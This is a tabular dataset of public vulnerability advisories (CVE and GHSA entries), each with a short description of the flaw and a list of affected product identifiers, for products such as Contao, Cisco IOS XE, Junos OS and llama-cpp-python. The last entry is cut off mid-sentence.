id
stringlengths 13
19
| title
stringlengths 0
256
| description
stringlengths 3
12.4k
| cpes
sequencelengths 0
5.42k
|
---|---|---|---|
GHSA-ffm9-hrr4-q7ph | The mintToken function of a smart contract implementation for Eastcoin, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value. | [] |
|
CVE-2023-42900 | The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2. An app may be able to access user-sensitive data. | [
"cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*"
] |
|
GHSA-cg4x-3743-j4cc | Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to elevate privileges or execute arbitrary code via a crafted message. | [] |
|
CVE-2023-37400 | IBM Aspera Faspex privilege escalation | IBM Aspera Faspex 5.0.0 through 5.0.7 could allow a local user to escalate their privileges due to insecure credential storage. IBM X-Force ID: 259677. | [
"cpe:2.3:a:ibm:aspera_faspex:5.0.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:*"
] |
GHSA-vh5f-hgf9-rcwq | Unspecified vulnerability in the Java SE and JavaFX components in Oracle Java SE 7u40 and earlier and JavaFX 2.2.40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-5777. | [] |
|
CVE-2024-42030 | Access permission verification vulnerability in the content sharing pop-up module
Impact: Successful exploitation of this vulnerability may affect service confidentiality. | [
"cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*",
"cpe:2.3:o:huawei:emui:14.0.0:*:*:*:*:*:*:*",
"cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*",
"cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*",
"cpe:2.3:o:huawei:harmonyos:4.2.0:*:*:*:*:*:*:*"
] |
|
CVE-2011-4335 | Multiple cross-site scripting (XSS) vulnerabilities in Contao before 2.10.2 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php in a (1) teachers.html or (2) teachers/ action. | [
"cpe:2.3:a:contao:contao_cms:*:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.0:beta-rc1:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.0:beta-rc2:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.0:beta-rc3:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.1:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.2:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.4:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.5:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.6:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.7:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.8:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.9:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.10:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.11:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.12:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.13:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.14:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.15:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.16:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.17:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.18:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.19:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.20:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.21:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.1.22:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.4:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.5:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.6:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.7:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.8:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.9:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.10:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.11:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.2.12:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.3.4:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.4.0:beta:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.4.2:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.4.3:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.4.4:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.4.5:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.4.6:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.4.7:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.0:beta:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.0:beta-rc2:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.1:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.2:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.3:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.4:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.5:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.6:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.7:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.8:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.5.9:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.0:beta:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.0:beta2:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.1:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.2:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.3:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.4:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.5:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.6:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.7:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.6.8:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.7.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.7.0:rc1:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.7.0:rc2:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.7.1:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.7.2:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.7.3:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.7.4:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.7.5:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.7.6:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.7.7:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.8.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.8.0:rc1:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.8.0:rc2:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.8.1:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.8.2:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.8.3:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.8.4:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.9.0:beta1:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.9.0:rc1:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.9.1:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.9.2:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.9.3:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.9.4:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.9.5:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.10.0:*:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.10.0:beta1:*:*:*:*:*:*",
"cpe:2.3:a:contao:contao_cms:2.10.0:rc1:*:*:*:*:*:*"
] |
|
CVE-2024-25898 | A XSS vulnerability was found in the ChurchCRM v.5.5.0 functionality, edit your event, where malicious JS or HTML code can be inserted in the Event Sermon field in EventEditor.php. | [] |
|
GHSA-2cw9-wr8h-2pwh | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to launch a denial-of-service (DoS) attack.We have already fixed the vulnerability in the following versions:
QTS 5.2.1.2930 build 20241025 and later
QuTS hero h5.2.1.2929 build 20241025 and later | [] |
|
GHSA-j4g4-rr9c-wgvh | An issue was discovered in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices, allowing authenticated command injection through the web interface. | [] |
|
CVE-2008-2444 | SQL injection vulnerability in userreg.php in CaLogic Calendars 1.2.2 allows remote attackers to execute arbitrary SQL commands via the langsel parameter. | [
"cpe:2.3:a:calogic:calogic_calendars:1.2.2:*:*:*:*:*:*:*"
] |
|
CVE-2005-0398 | The KAME racoon daemon in ipsec-tools before 0.5 allows remote attackers to cause a denial of service (crash) via malformed ISAKMP packets. | [
"cpe:2.3:a:ipsec-tools:ipsec-tools:0.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:ipsec-tools:ipsec-tools:0.5:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2003-07-11:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2004-04-05:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2004-04-07b:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2004-05-03:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2005-01-03:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2005-01-10:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2005-01-17:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2005-01-24:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2005-01-31:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2005-02-07:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2005-02-14:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2005-02-21:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2005-02-28:*:*:*:*:*:*:*",
"cpe:2.3:a:kame:racoon:2005-03-07:*:*:*:*:*:*:*",
"cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*",
"cpe:2.3:o:altlinux:alt_linux:2.3:*:compact:*:*:*:*:*",
"cpe:2.3:o:altlinux:alt_linux:2.3:*:junior:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:3.0:*:advanced_servers:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:3.0:*:enterprise_server:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:3.0:*:workstation:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:4.0:*:advanced_server:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:4.0:*:enterprise_server:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:4.0:*:workstation:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_desktop:3.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_desktop:4.0:*:*:*:*:*:*:*",
"cpe:2.3:o:suse:suse_linux:*:*:desktop:*:*:*:*:*",
"cpe:2.3:o:suse:suse_linux:*:*:enterprise_server:*:*:*:*:*",
"cpe:2.3:o:suse:suse_linux:9.1:*:*:*:*:*:*:*",
"cpe:2.3:o:suse:suse_linux:9.1:*:x86_64:*:*:*:*:*",
"cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*",
"cpe:2.3:o:suse:suse_linux:9.2:*:x86_64:*:*:*:*:*"
] |
|
GHSA-chv5-gcx2-vw99 | A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.7.2, macOS Sequoia 15.2, macOS Ventura 13.7.2. An app may be able to determine a user’s current location. | [] |
|
GHSA-gcf4-543f-pp2q | afu_mmio_region_get_by_offset in drivers/fpga/dfl-afu-region.c in the Linux kernel through 6.1.12 has an integer overflow. | [] |
|
CVE-2011-0406 | Heap-based buffer overflow in HistorySvr.exe in WellinTech KingView 6.53 allows remote attackers to execute arbitrary code via a long request to TCP port 777. | [
"cpe:2.3:a:wellintech:kingview:6.53:*:*:*:*:*:*:*"
] |
|
CVE-2007-3284 | corefoundation.dll in Apple Safari 3.0.1 (552.12.2) for Windows allows remote attackers to cause a denial of service (crash) via certain forms that trigger errors related to History, possibly involving multiple form fields with the same name. | [
"cpe:2.3:a:apple:safari:3.0.1:*:windows:*:*:*:*:*"
] |
|
GHSA-f9qp-74gh-6jqw | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Group Replication Plugin). Supported versions that are affected are 5.7.33 and prior and 8.0.23 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | [] |
|
CVE-2025-22546 | WordPress jQuery TwentyTwenty plugin <= 1.0 - Cross Site Scripting (XSS) vulnerability | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in One Plus Solution jQuery TwentyTwenty allows Stored XSS.This issue affects jQuery TwentyTwenty: from n/a through 1.0. | [] |
CVE-2025-1304 | NewsBlogger <= 0.2.5.1 - Authenticated (Subscriber+) Arbitrary File Upload | The NewsBlogger theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the newsblogger_install_and_activate_plugin() function in all versions up to, and including, 0.2.5.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | [] |
GHSA-8mq9-46wx-cw4x | An issue was discovered in certain Apple products. iOS before 10.1 is affected. macOS before 10.12.1 is affected. tvOS before 10.0.1 is affected. The issue involves the "CFNetwork Proxies" component, which allows man-in-the-middle attackers to spoof a proxy password authentication requirement and obtain sensitive information. | [] |
|
CVE-2002-2064 | isadmin.php in PhpWebGallery 1.0 allows remote attackers to gain administrative access via by setting the photo_login cookie to pseudo. | [
"cpe:2.3:a:phpwebgallery:phpwebgallery:1.0:*:*:*:*:*:*:*"
] |
|
CVE-2015-3792 | QuickTime 7 in Apple OS X before 10.10.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted file, a different vulnerability than CVE-2015-3765, CVE-2015-3779, CVE-2015-3788, CVE-2015-3789, CVE-2015-3790, CVE-2015-3791, CVE-2015-5751, CVE-2015-5753, and CVE-2015-5779. | [
"cpe:2.3:a:apple:quicktime:7.0.0:*:*:*:*:*:*:*",
"cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"
] |
|
GHSA-273h-mfpf-cvq6 | An issue was discovered in Samsung Mobile Processor and Wearable Processor Exynos 850, Exynos 1080, Exynos 2100, Exynos 1280, Exynos 1380, Exynos 1330, Exynos W920, Exynos W930. The mobile processor lacks proper memory deallocation checking, which can result in a UAF (Use-After-Free) vulnerability. | [] |
|
GHSA-3vf5-m872-p593 | In Android before 2018-04-05 or earlier security patch level on Qualcomm Snapdragon Automobile and Snapdragon Mobile SD 410/12, SD 425, SD 430, SD 450, SD 617, SD 625, SD 650/52, SD 810, SD 820, and SD 820A, a buffer overflow can occur in SafeSwitch. | [] |
|
CVE-2023-5626 | Cross-Site Request Forgery (CSRF) in pkp/ojs | Cross-Site Request Forgery (CSRF) in GitHub repository pkp/ojs prior to 3.3.0-16. | [
"cpe:2.3:a:pkp:open_journal_systems:*:*:*:*:*:*:*:*",
"cpe:2.3:a:sfu:open_journal_system:*:*:*:*:*:*:*:*"
] |
CVE-2024-49930 | wifi: ath11k: fix array out-of-bound access in SoC stats | In the Linux kernel, the following vulnerability has been resolved:
wifi: ath11k: fix array out-of-bound access in SoC stats
Currently, the ath11k_soc_dp_stats::hal_reo_error array is defined with a
maximum size of DP_REO_DST_RING_MAX. However, the ath11k_dp_process_rx()
function access ath11k_soc_dp_stats::hal_reo_error using the REO
destination SRNG ring ID, which is incorrect. SRNG ring ID differ from
normal ring ID, and this usage leads to out-of-bounds array access. To fix
this issue, modify ath11k_dp_process_rx() to use the normal ring ID
directly instead of the SRNG ring ID to avoid out-of-bounds array access.
Tested-on: QCN9074 hw1.0 PCI WLAN.HK.2.7.0.1-01744-QCAHKSWPL_SILICONZ-1 | [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
] |
GHSA-hpq2-jq6g-6g73 | Mattermost versions 9.10.x <= 9.10.2, 9.11.x <= 9.11.1, 9.5.x <= 9.5.9 and 10.0.x <= 10.0.0 fail to properly authorize the requests to /api/v4/channels which allows a User or System Manager, with "Read Groups" permission but with no access for channels to retrieve details about private channels that they were not a member of by sending a request to /api/v4/channels. | [] |
|
CVE-2010-2405 | Unspecified vulnerability in the Siebel Core - Highly Interactive Client component in Oracle Siebel Suite 7.7.2.12, 7.8.2.14, 8.0.0.10, and 8.1.1.3 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2010-3500. | [
"cpe:2.3:a:oracle:siebel_suite:7.7.2.12:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:siebel_suite:7.8.2.14:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:siebel_suite:8.0.0.10:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:siebel_suite:8.1.1.3:*:*:*:*:*:*:*"
] |
|
CVE-2024-8878 | Unauthenticated Password Reset | The password recovery mechanism for the forgotten password in Riello Netman 204 allows an attacker to reset the admin password and take over control of the device.This issue affects Netman 204: through 4.05. | [
"cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*",
"cpe:2.3:h:riello-ups:netman_204:-:*:*:*:*:*:*:*"
] |
CVE-2009-0443 | Stack-based buffer overflow in Elecard AVC HD PLAYER 5.5.90116 allows remote attackers to execute arbitrary code via an M3U file containing a long string in a URL. | [
"cpe:2.3:a:elecard:elecard_avc_hd_player:5.5.90116:*:*:*:*:*:*:*"
] |
|
GHSA-h6v8-7qf5-22h6 | Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WPKube Authors List plugin <= 2.0.2 versions. | [] |
|
GHSA-h3h6-5r2r-j574 | An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based, attacker to cause Denial of Service (DoS). A PFE crash will happen when a GPRS Tunnel Protocol (GTP) packet is received with a malformed field in the IP header of GTP encapsulated General Packet Radio Services (GPRS) traffic. The packet needs to match existing state which is outside the attackers control, so the issue cannot be directly exploited. The issue will only be observed when endpoint address validation is enabled. This issue affects Juniper Networks Junos OS on SRX Series: 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S4; 20.4 versions prior to 20.4R3-S3; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2; 22.1 versions prior to 22.1R1-S1, 22.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 20.2R1. | [] |
|
GHSA-m9g4-wj7p-7hxp | The Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted name for a (1) file or (2) directory, aka "Command Injection Vulnerability." | [] |
|
GHSA-rvrv-6xrw-v985 | A vulnerability in the web UI of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to gain read and write access to information that is stored on an affected system.
The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by persuading a user to import a crafted XML file with malicious entries. A successful exploit could allow the attacker to read and write files within the affected application. | [] |
|
GHSA-c7qc-8vhx-j958 | PHP remote file inclusion vulnerability in index_inc.php in ea gBook 0.1 and 0.1.4 allows remote attackers to execute arbitrary PHP code via a URL in the inc_ordner parameter. | [] |
|
CVE-2022-32449 | TOTOLINK EX300_V2 V4.0.3c.7484 was discovered to contain a command injection vulnerability via the langType parameter in the setLanguageCfg function. This vulnerability is exploitable via a crafted MQTT data packet. | [
"cpe:2.3:o:totolink:ex300_v2_firmware:4.0.3c.7484:*:*:*:*:*:*:*",
"cpe:2.3:h:totolink:ex300_v2:-:*:*:*:*:*:*:*"
] |
|
GHSA-vrrp-56vv-xwg7 | A vulnerability in the Link Layer Discovery Protocol (LLDP) subsystem of Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software could allow an adjacent, unauthenticated attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges. The vulnerability is due to improper input validation of certain type, length, value (TLV) fields of the LLDP frame header. An attacker could exploit this vulnerability by sending a crafted LLDP packet to the targeted device. A successful exploit may lead to a buffer overflow condition that could either cause a DoS condition or allow the attacker to execute arbitrary code with root privileges. Note: This vulnerability cannot be exploited by transit traffic through the device; the crafted packet must be targeted to a directly connected interface. This vulnerability affects Cisco Nexus 9000 Series Fabric Switches in ACI mode if they are running a Cisco Nexus 9000 Series ACI Mode Switch Software release prior to 13.2(7f) or any 14.x release. | [] |
|
GHSA-5x4w-6r2x-m2rf | The SSL implementation in Apple Safari before 5.1.1 on Mac OS X before 10.7 accesses uninitialized memory during the processing of X.509 certificates, which allows remote web servers to execute arbitrary code via a crafted certificate. | [] |
|
GHSA-qq6h-h8q7-3pg5 | A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /index.php?page=member. The manipulation of the argument columns[0][data] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-237570 is the identifier assigned to this vulnerability. | [] |
|
GHSA-3qwm-q2c3-qv6x | IBM UrbanCode Deploy (UCD) 7.0.5 could allow a user with special permissions to obtain sensitive information via generic processes. IBM X-Force ID: 175639. | [] |
|
GHSA-j4xm-4jpq-qhwx | Multiple vulnerabilities in the CLI parser of Cisco IOS XE Software could allow an authenticated, local attacker to gain access to the underlying Linux shell of an affected device and execute arbitrary commands with root privileges on the device. The vulnerabilities are due to the affected software improperly sanitizing command arguments to prevent access to internal data structures on a device. An attacker who has user EXEC mode (privilege level 1) access to an affected device could exploit these vulnerabilities on the device by executing CLI commands that contain crafted arguments. A successful exploit could allow the attacker to gain access to the underlying Linux shell of the affected device and execute arbitrary commands with root privileges on the device. Cisco Bug IDs: CSCtw85441, CSCus42252, CSCuv95370. | [] |
|
GHSA-jm3f-754c-hx48 | PHP remote file inclusion vulnerability in config_settings.php in Cacti before 0.8.6e allows remote attackers to execute arbitrary PHP code via the config[include_path] parameter. | [] |
|
GHSA-cv4m-7ph2-f339 | Missing Authorization vulnerability in Easy Digital Downloads allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Digital Downloads: from n/a through 3.2.12. | [] |
|
GHSA-w75q-4cfj-fmmg | Improper input validation vulnerability in Attaching Files of Cybozu Garoon 4.0.0 to 5.0.2 allows a remote attacker to alter the data of Attaching Files. | [] |
|
GHSA-fmrx-h2g3-68q2 | The LedLine.gr Official (aka com.automon.ledline.gr) application 1.4.0.9 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. | [] |
|
CVE-2006-2565 | SQL injection vulnerability in Alstrasoft Article Manager Pro 1.6 allows remote attackers to execute arbitrary SQL commands via (1) the author_id parameter in profile.php and (2) the aut_id parameter in userarticles.php. NOTE: the aut_id vector can produce resultant path disclosure if the SQL manipulation is invalid. | [
"cpe:2.3:a:alstrasoft:article_manager_pro:1.6:*:*:*:*:*:*:*"
] |
|
CVE-2021-24096 | Windows Kernel Elevation of Privilege Vulnerability | Windows Kernel Elevation of Privilege Vulnerability | [
"cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:arm64:*",
"cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2004:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_20h2:*:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_10_20h2:*:*:*:*:*:*:arm64:*",
"cpe:2.3:o:microsoft:windows_server_20h2:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*"
] |
GHSA-56xg-wfcc-g829 | llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata | Description`llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to RCE by a carefully constructed payload.Source-to-Sink`llama.py` -> `class Llama` -> `__init__`:In `llama.py`, `llama-cpp-python` defined the fundamental class for model initialization parsing (Including `NUMA, LoRa settings`, `loading tokenizers,` and stuff ). In our case, we will be focusing on the parts where it processes `metadata`; it first checks if `chat_format` and `chat_handler` are `None` and checks if the key `tokenizer.chat_template` exists in the metadata dictionary `self.metadata`. If it exists, it will try to guess the `chat format` from the `metadata`. If the guess fails, it will get the value of `chat_template` directly from `self.metadata.self.metadata` is set during class initialization and it tries to get the metadata by calling the model's metadata() method, after that, the `chat_template` is parsed into 